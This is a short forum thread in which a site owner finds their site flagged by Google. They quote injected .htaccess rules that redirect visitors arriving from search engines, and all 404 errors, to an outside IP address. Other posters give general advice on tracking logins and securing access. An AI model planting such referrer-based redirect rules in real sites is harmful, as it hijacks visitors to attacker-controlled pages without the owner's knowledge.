Hey guys! I just noticed my site is being blocked by Google and has a popup if you visit the site through a search on Google. How has somebody added this and where should I look for whatever has been added? I can't see anything obvious. www.HuxleyGame.com
I can´t see ur site cause it might have an endless loop in it. But I guess ur site is hosted on a free host with ads. Probably ...
Some idiots put this code in my .htaccess RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L] Errordocument 404 http://87.248.180.88/in.html?s=hg_err Code (markup): They need to sort their lives out if they have nothing better to do . . .
The question I would be asking is how they got in there. You not got your back end locked down. Or is there more than one of you updating the site. (This is usually the case when your ) The amount of times a client has said have you altered my site and when I asked them who new the login details the penny usually. Always best to have last logged in IP address on the back end so you know who it is.
Affilit is right gobbly. It seems like your entrance is not closed, bolted and padlocked shut. I would Google around for a few security tools like a script that records IP Address and as Affilit mentioned, something that records the IP address of the user uploading/modifying pages on your root. If you use cPanel, they automatically do this.